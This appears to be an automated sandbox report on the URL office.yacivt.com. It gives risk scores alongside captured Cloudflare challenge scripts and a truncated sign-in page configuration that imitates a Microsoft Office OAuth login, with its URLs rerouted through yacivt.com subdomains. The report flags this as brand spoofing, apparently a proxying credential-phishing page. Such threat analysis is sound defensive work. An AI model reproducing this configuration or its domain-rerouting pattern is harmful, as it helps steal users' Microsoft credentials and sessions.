URL: http://office.yacivt.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: http://office.yacivt.com |
URL: https://office.yacivt.com/wriEcFSZ... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "office.yacivt.com",cType: 'managed',cRay: '8f39dfc639ba4240',cH: '08CNZvnPtYFKcwdYQS1XXWRji7E8SU7fWgvpAa5RxQU-1734469556-1.2.1.1-UfUy.ODFxe9PsYLMRr4LyLa7eQi8i8ZlX_7thhkzxaR34VgDgE2PEM7wkWmdfpIt',cUPMDTk: "\/wriEcFSZ?__cf_chl_tk=u3QxlQJkYaRJN0Gk8SDYFFeQ8eDAqPZYTcxDksVOHps-1734469556-1.0.1.1-WZT0OAR1XUlx1H5hmO9y0jJnW.5wAnZNubxrtsjemSk",cFPWv: 'b',cITimeS: '1734469556',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/wriEcFSZ?__cf_chl_f_tk=u3QxlQJkYaRJN0Gk8SDYFFeQ8eDAqPZYTcxDksVOHps-1734469556-1.0.1.1-WZT0OAR1XUlx1H5hmO9y0jJnW.5wAnZNubxrtsjemSk",md: "SGAslMM4i8m1eDYXNcJJmBdcDhFle.qZQbJdUQYh0xw-1734469556-1.2.1.1-Oe41dRsYOYOU_MbpP8Hieup6JzWRzeoy97_ywEiwATazCatCLKeo9l4OT39qYS52.qBBm89qj6BrkzDnto4N_NG3_VhtAUwOt2lE1E6a52soLVdrOFqHXkInZ377hwiruaQCBEMmRyUhhQUqNR4mKXCeghcAvUxB1nF.Ep62tRNoKVBT3Y69BZsSz7U5doEqAWbVjZHJQILUbw_Rx6oPTJD9_M17_rwufxB.RlGCZ_MPzmvGkUMqirZTj6k4LFiXxnUwqVRuMi9pUChkUol0AtQf7EZdxDMzoPTt5K8i6q_0g.5acMUcxAni42GnNbyvA98oPbZxW8OC4EiLItUZJ7WK3G59R3FoegN19qdgthzxna_I9q4bQwuNIzIlmsIa.1p_VWrHSkgXLWGZFDGpmTukn306GAhxeOAJa4MPLTNcFFwpdzFF6LJhHH24qnj.UWan_ieS42GPPsvibjhMCpAfQMSXtNf1d.MrKGuzwE.bKem43Y2GJnSBGRf86XM6vmsrUV3CXSvf0NW0ZQoo_zI1NtN84fdXBRjJJfGdSud20Up7BYklhSKbbkTQL_x1pjFUSwrFLcBWwBpHOH6WVFRjEjVZiT1wnebB8uJ6a4jEcfVdnm5IezoRaMEPn9qEa9TG5HzSvACHvUHwV33U.0k31D1BZxy8bi6VdZieHLcJAaBwKPIHtmIN6.jBu2toD4adiMkDtmADcCj0tie8NHa90.dhWqLDpwdVhCCFb6NYtREyjRoCgBUHSpM2IJHdYxkfywG7I8Bw1vXWpoOeWRKKC94OW9nd6iwx9Ouudq30bV1mJMBoCe_IMEPpR.Kp.lGxkFRVfHIdDRk1HmsxRumSVCziUN.ofNWve4zTsUigu8ciALJ0mO1wE4k.PJeiizzYsvjMdCyZPobI0OOLgIuREEepvHtQWNbix4Og3HDOSubmzTlKO6f_vWOct9vmxGaDeCxAp52bbKHCaZFqp4HddcZbHvHFDTr2m.qxrysCyz7susbklQzTepXefWIa7GxOt6Q5wbFfZicQ2LuSmqNPFDx59ReJ.cO3smPGI3FKCYXTOga_zNSlXcROfvy_M4mU83ySdIOsKpqiy6N_I3MXOCTaM4vuo7L4YL4AzXNEWUXstJDbS7EAB1nv80dyUoxdDE6K8uoRj2Lvz.i7B3l3TNS3PiisL55NbxzjGALXS24HvTBn1rxDbVyFnIQDw91UocUEs8LTvEz1ABOZUeyWfEANh13JXQ57e8fmp.CSuzDTM94JP6IQtBrdLea0hqxodUztHl28GnWz7EujZm
6OEO.Cnz6hohn91BZR2nT5zkAxcG3nhIou_4cxAW02Cq13Br98b461n7IaLy_Jkay7kX0tZoxOUFoAhmzPcywl_DCBy53l07xX3TaDEi4bRbDUpxqSY1pmoA_jWZ6L4LeN58DA_FX5eEX.2eTlRrGOdhwWSHL16AryP20A_Dg1Wiz7O7PmFVZKF1RJMcE7sv8Q9URRQZ4SB6kvwfK8MN_ILvnNtY_VT_JiwqPb07Re.2qT6TTguJBtecLv7hLAGDsByvyym0xNlJ.3WlOO4bj_d55zTrmd3amzUKAewSJuzZf_amL5FbMdU.swRyTozC9FMtTR6J_1qE6NZO_LRiOAtM.oY2PORyyWfbe1w7GYfb5F7Mq1lLH9yKUkYjsuI2iUrwH2p7IwbEdU.L4nnI7BYPwfVEJwJkMm8l7nbhq.w_bI5UVmnbyB3dNy8fC2M0H4ob.nhgJgcS2h79KO2tTPin7ml.0diFyJiJojRM9WK2YUIp6nZXzpFyUOq0ARBzJuj6kzR_dms5tbWop2wkIRFo7b7KUVUuYfAEWnj7W2la_oxeX_4CsceAZ6fcTMm5Az0scbAq_M1D_s5Z5CnPuaSSh5cC7GYAJWKOSj2TjtGXSRSB374wJcTX3GJm2XwMaHSyR0nEE4bNPhs3Tx7RV.3Ce1OQUVnbQsMsoEGF3VTNcTu50Huh3gv66A2THzSx0pFnKfJfMfQIzL7h2jUdvmOCS6nWaxOaKG3Ln038k4P1BoNWOCLvjpkHmZ3.8.9X0i1F6Hu5lZTPoiqWyAzbDRJdnBxf9u6DTjIxZLUoVmxzT_2YDYJjywupsAXexOkJ1zjBJDoTJ3DJXbnk2LK.u1N.W4EqNMFfveCJa30mx5QZkrfZFH4RKAVD.fRBz76WAGV7gRALkdlaMk1oS3AkoOCzU3Tubg5UHHTgEnOkfZwCVKusVSO1p_fvn_y5Khixpgbvu3zFSX_.1Y5dHZ98BhXe8WtUjJGgOV8lLHFQDTDPLs7k.KVNRoLd4K0soSrKBfioux76kbSiyn0fcpNYdvd0NWSFoPVc9DfGy1NOh0EUiF7.U7mPY99GVYnMRpWG6LvlZxh7YzolguEQRvkcW_4452Y6vmsV.mQTQpoH3cfjZrlUxZBzNWrveuzFO1iTFO_ecVFPuh_CurxowtPOdgwVonTGnLqo4MkZ6agZTfMTNODoqoABwRgGTNYrBYwerv4JYuvgqtrgHgjXOKdg37mg53rgFVzsbEvkYaImZCQgEtCwbLyG5l4bEVTPMm384MrJ8VnErXYaX4NXpoQhs",mdrd: 
"bt1LEfAkNJ3..wQw07I_snb0qFhubK.gD9lAZrvT5j8-1734469556-1.2.1.1-BYvi3ahEfaZxDxCbXtzAte.bXCm6DaRS69Hv.DB.NpcWRZKuyWuCAbRV0o3yxQ8d_Fh1JYZt_RCAhw2F1W67stRIAx51GMoHkn8CbLOX7auQdRVO7osIT7J7oQs.JiRkygyCaNGxq81aLEqVyTvnKJkYnE90Hdb.DqEzEAfjV3qPJAtnPoD9nlR6_ekZ7RgZ40ovVfNIoLzFn7k7E7dUucAcN1_zQbwVsKJhvJwVAn1tD44ZczHRlcFVZc5fA5h5J1_Ai4kPi7WKUSzSKPd7FntpXQfQTk7NzCZeQrWUzoqM_hMTejsUX2NvLlvbV9ys3Qymzh8khSW3gV2H17jf3h2UAb63RFAMYVinxmUNnM_GFmpX_Bjv8bbd_8hBMbRnWjuUY21.IMyKvHfZQ7EaNhcnk6Ez86ZZ3iSEtgEXpMsmxZownNOuu5crTR65BN1ii0g0wLmDvU7vGBtI19fZIoVPjSAJvAsfB7RbXiMFRadw01aMMJ78ltYKzWTIfHqbVE.rofWpj6BbBk7CtFJzkc5Oa1EHg0mOLKLBiJylxyiHoDqu8WT4G3WWKWD_aWeZZod36OEBCwPhUtohhxNgRiuSX2IJnso8SYC7wYHhEI65zX7geGEzPBk |
URL: https://office.yacivt.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://office.yacivt.com |
URL: https://challenges.cloudflare.com/turnstile/v0/b/7... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate behavior for websites that use Cloudflare's security services. The script sets up various configuration options for the Cloudflare challenge and includes some communication between the script and the parent window. While it uses some techniques like message passing and dynamic configuration, these are common practices for Cloudflare's challenge system and do not indicate any malicious intent. The script does not exhibit any high-risk behaviors, and the overall risk is low."
} |
// Bootstrap captured for a Cloudflare challenge widget frame: it publishes the
// widget's options on window._cf_chl_opt and registers one `message` listener.
// Nothing in this block reads form fields, cookies or storage, and it makes no
// network request; its only outbound channel is postMessage to window.parent.
(function(){
window._cf_chl_opt={
cvId: '3',
// cZone names Cloudflare's own challenge host here, not the site that embeds the widget.
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
// Widget instance id; the same literal is hard-coded in refresh() below.
chlApiWidgetId: 'bf0t8',
// NOTE(review): the sitekey presumably identifies the embedding site's widget
// registration, which would make it a pivot for correlating related pages. Confirm.
chlApiSitekey: '0x4AAAAAAADnPIDROrmt1Wwj',
chlApiMode: 'managed',
chlApiSize: 'normal',
// chlApiRcV, cH and md all embed the epoch value held in cITimeS, so they look
// like per-request tokens rather than stable indicators (inferred from the
// shared timestamp, not confirmed).
chlApiRcV: 'JPVX3ghKOhJvx1YZykA8KrtP.x3c8qvku1KcOXcFK2Y-1734469564-1.3.1.1-aH7bUfwakjPosP_qyuSnjQeA7xy3Z5pbIS.mE4Yun7I',
chlApiTimeoutEncountered: 0,
// Presumably millisecond budgets, going by the `Ms` suffix; the code that
// consumes them is not part of this block.
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f39dffadb8d8c06',
cH: 'lrXzJeZtSKYS6NqCTVMsFe1grHp2TpeoBkAlSwJb.OM-1734469564-1.1.1.1-RfJ5.rK95DnPSI6q_x.4fpt7WEysU.xaymZaHu1jXejKliO25vJ8LT42Ycyt4B7R',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
// Opaque blob; nothing in this block decodes or inspects it.
md: 'fCymOqtI9OCXewqlEEoUTYmdOHOBJu9OxUm_qHpLPf8-1734469564-1.1.1.1-BeXNYoYHq8rj8oCqv1FZn_5PLfAp8KhTvgUV8xgBrGnReJL0BiR1gNPKHmYJ.rb77vwWYwIEo5rJzfWhsG6enbLsBu9Uop55ypL_i13L67zbXzcLl1P5CSMg5PX_7x0TET_eWe3bJG0zcivph7VkX3.wicigF7O9xzE8AbV9q5p_52OSYT9nFT7kO3XIGrDuj5IUg6WKjWvPMEpvjcWRYTD57WAHp4cxNOGWrRv8nS6eNllS7.jIgVPvo1mtmEFogovGCPqMLKQTjKWJwK.QVUt6NbU7VqUoLQyh1_8kCP3WS6VV8gwPLeQ5Ffd1aTV8bCU0GRtoMsC1Kb0TKw7JzJUWdUTdB2mOe.wo8Lt7p4BEL7PFJcb4lZVRAS8Dd802VarLBunv8L5C_SKzG.91aK3MLCebjQHquXt2Nk8ZHIIWKOdhwvydrfaiRMxJn1fR5ZiSRojvQ_1nIjY8QxTVEz.AhVwLM_7SScd9F1Si363XHMef9OZPcYmV3J48YergURp1rDRKzSeQ3xq5iRkyKkS5jbkmt3_UnSDgASLMzA6bEFZf1r_.Yv.aH10oTfM4vGfdj1FCxewDYpBfXdZ298ePHuHZlZw6uRI6mSW7FBsr4uisu5XvZ8kJh_MQjsG6.d0CvnmPU8Nv_0vPSG63L1yG3cNpwpLE5yVb2I6tiU80VQPKSF3c3Tk3In9nr3zHQqm._vtnhsAdwHIM34vyTH2tTFRmaUFgeE0UlCiVOCbckdToV8hDrG.NpdJz6zoqDPQO6RPiMB6DsEp_MhHTmAP5XbrySnvFZ_RFkPLGUKXmzgknDVGcmdv6dQa8PI06G0vxtsG6ks4imBiD762.kZ8YUaojOyCSjXRdjpYeM.RBB9w1isRHs2PMgXIxzd5qxVrvL0sr2WJ3UWtL9yR4Cg25M6Haixxx.MaurBb4XeRzPo9pV57M2nY_wPjfBHGL_mFT8F9UydsBziXBIyiOkYSJmZgFFndjNDXg0rgbudSAkYfvgrePxTZ3snY50tZahjoxWcECXZVPuQDN4bEWD.4wBfBwBnGAoj1IQORriDvz4brF4T_9tyN1JpjsiqEUMJj8C9ngOnzPFM9izeQgi.q8BqwWnonLh2OrCo8LWOP2_o3obIg1vj6w9OQ.uliLZI1aHL9NmfAO7PlHGTJ3lf9iDUg3o5Acln2aCKRuH448StdxwREZdDxb7zz2IOl_lgUUZUGJ85aOaoEgXfucXYuji7e9i5MY3snV_nZIvcBn35ImQyVObZ0eWfiJoIDciDd4ircrwh0fJEaU8LUpgetvMnGKsuj4.eUmZMRb.3XJATNWCJ8QrHyJmzib420fAIwgONxg91dXLXj_AJx1Q7a.9Flih0AqEzrYcFWoRVFZj1w7qyFxf8xlWR1YAdvV',
cITimeS: '1734469564',
// refresh(): sends the embedding window a `reloadRequest` that carries the
// widget id and the nextRcV token (the same string as chlApiRcV above).
refresh: function(){
// window.parent is the window itself when the page is not framed, so this
// guard does not by itself prove that a separate parent frame exists.
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'bf0t8',
nextRcV: 'JPVX3ghKOhJvx1YZykA8KrtP.x3c8qvku1KcOXcFK2Y-1734469564-1.3.1.1-aH7bUfwakjPosP_qyuSnjQeA7xy3Z5pbIS.mE4Yun7I',
event: 'reloadRequest',
// targetOrigin "*" delivers the payload to whatever origin framed this
// document; the message is not pinned to a specific parent origin.
}, "*");
}
}
};
// Message responder: replies to a 'meow' message addressed to this widget
// with a 'food' message echoing the caller's seq. This looks like a liveness
// ping/pong between the embedding script and the frame (TODO confirm).
var handler = function(event) {
var e = event.data;
// Only fields of the payload are checked; event.origin and event.source are
// never examined, so any window holding a reference to this frame can trigger
// the reply. NOTE(review): a null or undefined event.data would throw on
// e.source.
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
// The reply goes to window.parent with a wildcard target, not back to the
// sender through event.source.
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare Turnstile challenge implementation, which is a legitimate security mechanism used to verify user interactions. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles the translation and configuration of the Turnstile challenge, which is a common practice for websites that use Cloudflare's security services. While the script uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely part of a legitimate website's security measures and does not raise significant security concerns."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_success":"Success%21","turnstile_footer_terms":"Terms","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_description":"Send%20Feedback","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","testing_only":"Testing%20only.","turnstile_verifying":"Verifying...","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_footer_privacy":"Privacy","turnstile_refresh":"Refresh","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_failure":"Error","turnstile_overrun_description":"Stuck%20here%3F","turnstile_feedback_report":"Having%20trouble%3F","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffun
damentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_timeout":"Timed%20out","turnstile_expired":"Expired"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eQ,eR,fk,fl,fm,fq,fr,fy,fC,fF,fI,fK,fL,fM,fY,ga,gg,gh,gi,gs,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1018))/1*(-parseInt(gI(439))/2)+-parseInt(gI(467))/3*(parseInt(gI(1139))/4)+parseInt(gI(1008))/5+parseInt(gI(891))/6*(-parseInt(gI(1137))/7)+-parseInt(gI(1020))/8*(-parseInt(gI(1365))/9)+parseInt(gI(1205))/10+-parseInt(gI(1341))/11,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,162071),eM=this||self,eN=eM[gJ(601)],eO=[],eP=0;256>eP;eO[eP]=String[gJ(518)](eP),eP++);eQ=(0,eval)(gJ(1053)),eR=atob(gJ(792)),eM[gJ(1091)]=function(c){try{return fj(c)}catch(e){return fh(fi(c))}},fk=function(c,hs,f,g,h,i,j,k){for(hs=gJ,f={'vQDoH':function(l,m){return l+m},'MOVGG':function(l,m){return l(m)},'wXQlj':function(l,m){return l%m}},k,h=32,j=f[hs(1338)](eM[hs(1327)][hs(1037)],'_')+0,j=j[hs(462)](/./g,function(l,m,ht){ht=hs,h^=j[ht(521)](m)}),c=eM[hs(638)](c),i=[],g=-1;!f[hs(1096)](isNaN,k=c[hs(521)](++g));i[hs(708)](String[hs(518)](((255&k)-h-f[hs(137)](g,65535)+65535)%255)));return i[hs(359)]('')},fl={},fl[gJ(745)]='o',fl[gJ(1337)]='s',fl[gJ(1491)]='u',fl[gJ(1484)]='z',fl[gJ(1531)]='n',fl[gJ(1219)]='I',fl[gJ(1221)]='b',fm=fl,eM[gJ(1313)]=function(g,h,i,j,hy,o,x,B,C,D,E,F){if(hy=gJ,o={'TfQSR':function(G,H){return G===H},'xCoMx':function(G,H){return G(H)},'TsxQo':function(G,H){return G+H},'nVzKc':function(G,H,I){return G(H,I)},'jhJig':function(G,H){return G+H},'dgujH':function(G,H,I){return G(H,I)}},o[hy(857)](null,h)||o[hy(857)](void 0,h))return 
j;for(x=fp(h),g[hy(934)][hy(640)]&&(x=x[hy(298)](g[hy(934)][hy(640)](h))),x=g[hy(1320)][hy(924)]&&g[hy(1437)]?g[hy(1320)][h |
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Verify you are human",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://office.yacivt.com/wriEcFSZ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to potentially untrusted domains, the use of obfuscated URLs, and the presence of fallback domains. While the script may have a legitimate purpose, such as authentication or analytics, the lack of transparency and the use of questionable practices warrant further investigation to determine the true intent and potential risks."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://ywnjb.yacivt.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_type=code+id_token\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVdwQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026response_mode=form_post\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026x-client-SKU=ID_NET8_0\u0026x-client-Ver=7.5.1.0\u0026uaid=37a7e2c64a3b47f6a0afccced59b0b1f\u0026msproxy=1\u0026issuer=mso\u0026tenant=common\u0026ui_locales=en-US\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026epct=PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe4rEtWNcG3jVQ2acCxZBwh4rInKHISb2qr30V5wo0DdNwu4csBLONgCsISQUT1je3QNvgPBHlvV1EVUY5hIXojxE7ALSZz5XKqJDr82GGd-l-kOJd3gLptfLP38W608RK35M6zoXnhwNcgYYxaD__DCo3pRqza-VZgRyoezn1mnLntvPG4atDMhpxnpt-gG9lFD-I5WlcvOOYpdrxSAnAmiAA\u0026jshs=0","urlMsaLogout":"https://ywnjb.yacivt.com/logout.srf?iframed_by=https%3a%2f%2foffice.yacivt.com","urlOtherIdpForget":"https://ywnjb.yacivt.com/forgetme.srf?iframed_by=https%3a%2f%2foffice.yacivt.com","showCantAccessAccountLink":true,"urlGitHubFed":"https://ywnjb.yacivt.com/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_type=code+id_token\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVd
